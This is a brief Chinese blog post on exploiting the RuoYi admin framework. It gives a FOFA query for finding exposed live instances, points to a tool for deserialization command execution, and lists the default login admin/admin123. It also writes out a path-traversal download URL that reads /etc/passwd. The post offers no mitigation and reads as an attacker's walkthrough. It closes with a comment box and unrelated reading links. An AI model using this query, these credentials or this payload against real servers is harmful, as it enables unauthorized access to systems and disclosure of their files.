若依框架漏洞(若依管理系统漏洞)

我不是女神ヾ 2023-09-26 09:58 472阅读 0赞

若依管理系统是基于SpringBoot的权限管理系统,若依框架漏洞推荐使用zhzy的vulmap工具查看。

1.早期若依框架漏洞版本有反序列化漏洞 ,执行任意命令

漏洞复现

祭出fofa大法,fofa语法如下

app=”若依-管理系统” && body=”admin”81399099e4ff43508b4ed99d3594ca35.png

利用工具检测漏洞 这里不提供,太多了,推荐使用zhzy的vulmap ada07216f4494043910cde684f8b04e7.png

利用poc执行任意命令3426847d7678406aa32cf637c41943e8.png

" class="reference-link">2后台登录若依管理系统后可以任意读取文件13402564c051420885cd62815f2524f8.png

登陆后访问 (默认弱口令 admin admin123)

https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd

读取 passwd

发表评论

表情:
评论列表 (有 0 条评论,472人围观)

还没有评论,来说两句吧...

相关阅读

    相关 后台管理系统06

    > 哈喽!大家好,我是旷世奇才李先生 > 文章持续更新,可以微信搜索【小奇JAVA面试】第一时间阅读,回复【资料】更有我为大家准备的福利哟,回复【项目】获取我为大家准备的项

    相关 框架---权限管理设计

    前言 若依权限管理包含两个部分:菜单权限 和 数据权限。菜单权限控制着我们可以执行哪些操作。数据权限控制着我们可以看到哪些数据。 菜单是一个概括性名称,可以细分为目录、

    相关 02【框架系统管理概述

    用户管理(1星) 用户增删改查,充值密码,改变状态等操作,并无特殊处理 角色管理 由于角色绑定了菜单树和数据权限层级,所以角色管理是非常重要的部分,在管理后台中